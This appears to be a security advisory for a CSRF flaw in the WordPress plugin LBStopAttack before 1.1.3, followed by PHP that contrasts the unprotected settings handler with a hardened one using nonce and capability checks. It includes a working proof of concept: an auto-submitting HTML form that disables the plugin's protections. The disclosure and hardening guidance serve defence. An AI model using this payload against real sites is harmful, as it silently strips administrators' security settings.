WPEX-ID: 9EBB8318-EBAF-4DE7-B337-C91327685A43

LBStopAttack < 1.1.3 - Arbitrary Settings Update via CSRF

Published: 2022-09-29
Author: Daniel Ruf
Tags: arbitrary settings update, csrf, form submission

EPSS: 0.001 (Low), percentile 34.1%

The plugin does not use nonces when saving its settings, making it possible for attackers to conduct CSRF attacks. This could allow attackers to disable the plugin’s protections.

<form id="test" action="https://example.com/wp-admin/admin.php?page=lbsa_home" method="post">
    <input type="text" name="savelbsa" value="1">
    <input type="text" name="onlyfront" value="0">
    <input type="text" name="checkwp" value="0">
    <input type="text" name="namespaces" value="GET">
    <input type="text" name="levelLFI" value="50">
    <input type="text" name="sendnotification" value="0">
    <input type="text" name="sendto" value="">
    <input type="text" name="raiseerror" value="0">
    <input type="text" name="redirurl" value="https://google.com">
    <input type="text" name="errorcode" value="">
    <input type="text" name="errormsg" value="">
    <input type="text" name="ipblock" value="0">
    <input type="text" name="ipblocktime" value="222">
    <input type="text" name="ipblockcount" value="666666666">
</form>
<script>
    document.getElementById("test").submit();
</script>
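As an added illustration (not the plugin's code and not part of the original advisory), the following PHP places the unprotected pattern the advisory describes next to a hardened WordPress settings handler that verifies a nonce and the caller's capability before writing anything. The function and hook names prefixed lbsa_, the option key lbsa_settings, the admin-post action name and the accepted value ranges are assumptions; the POST field names are those used by the PoC form above.

```php
<?php
// Added illustration, not the LBStopAttack plugin's code. Everything prefixed
// lbsa_ and the option key 'lbsa_settings' are assumed names; the POST field
// names match the advisory's PoC form.

// Pattern the advisory describes: any request to the settings page carrying
// savelbsa=1 is trusted. A form on a third-party site submitted by a logged-in
// administrator's browser therefore rewrites the settings (CSRF).
function lbsa_save_settings_unprotected() {
    if ( empty( $_POST['savelbsa'] ) ) {
        return;
    }
    update_option( 'lbsa_settings', lbsa_sanitize_settings( $_POST ) );
}

// Hardened form: the page renders a nonce tied to this action and user.
function lbsa_render_settings_form() {
    $current = (array) get_option( 'lbsa_settings', array() );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="lbsa_save_settings">
        <?php wp_nonce_field( 'lbsa_save_settings', 'lbsa_nonce' ); ?>
        <label>Redirect URL
            <input type="url" name="redirurl"
                   value="<?php echo esc_attr( $current['redirurl'] ?? '' ); ?>"></label>
        <label>Block IPs
            <input type="checkbox" name="ipblock" value="1"
                   <?php checked( ! empty( $current['ipblock'] ) ); ?>></label>
        <?php submit_button( 'Save settings' ); ?>
    </form>
    <?php
}

// Hardened handler: capability check, then nonce check, then typed sanitising.
function lbsa_save_settings_protected() {
    // 1. Only users permitted to change site options may proceed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // 2. The nonce proves the request came from a form this site rendered for
    //    this user; a cross-site form cannot supply it. check_admin_referer()
    //    terminates the request when the nonce is missing or invalid.
    check_admin_referer( 'lbsa_save_settings', 'lbsa_nonce' );

    // 3. Store typed, bounded values rather than raw input.
    update_option( 'lbsa_settings', lbsa_sanitize_settings( $_POST ) );

    wp_safe_redirect( add_query_arg( 'updated', '1', admin_url( 'admin.php?page=lbsa_home' ) ) );
    exit;
}
add_action( 'admin_post_lbsa_save_settings', 'lbsa_save_settings_protected' );

// Normalises every field the PoC form posts. The allowed namespaces and the
// 0..100 bound on levelLFI are assumptions for the illustration.
function lbsa_sanitize_settings( array $input ): array {
    $allowed_namespaces = array( 'GET', 'POST', 'COOKIE' );
    $namespace          = (string) ( $input['namespaces'] ?? 'GET' );
    return array(
        'onlyfront'        => ! empty( $input['onlyfront'] ) ? 1 : 0,
        'checkwp'          => ! empty( $input['checkwp'] ) ? 1 : 0,
        'namespaces'       => in_array( $namespace, $allowed_namespaces, true ) ? $namespace : 'GET',
        'levelLFI'         => min( 100, max( 0, (int) ( $input['levelLFI'] ?? 50 ) ) ),
        'sendnotification' => ! empty( $input['sendnotification'] ) ? 1 : 0,
        'sendto'           => sanitize_email( (string) ( $input['sendto'] ?? '' ) ),
        'raiseerror'       => ! empty( $input['raiseerror'] ) ? 1 : 0,
        'redirurl'         => esc_url_raw( (string) ( $input['redirurl'] ?? '' ) ),
        'errorcode'        => (int) ( $input['errorcode'] ?? 0 ),
        'errormsg'         => sanitize_text_field( (string) ( $input['errormsg'] ?? '' ) ),
        'ipblock'          => ! empty( $input['ipblock'] ) ? 1 : 0,
        'ipblocktime'      => max( 0, (int) ( $input['ipblocktime'] ?? 0 ) ),
        'ipblockcount'     => max( 0, (int) ( $input['ipblockcount'] ?? 0 ) ),
    );
}
```

The order of the checks matters: the capability check rejects anyone who should never reach the handler, and the nonce check rejects a request that a legitimate user's browser was tricked into sending, which is exactly the case the PoC form exercises. When reviewing a plugin for this class of bug, look for every update_option() or settings write that is reachable from a request and confirm that a check_admin_referer() or wp_verify_nonce() call guards it.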

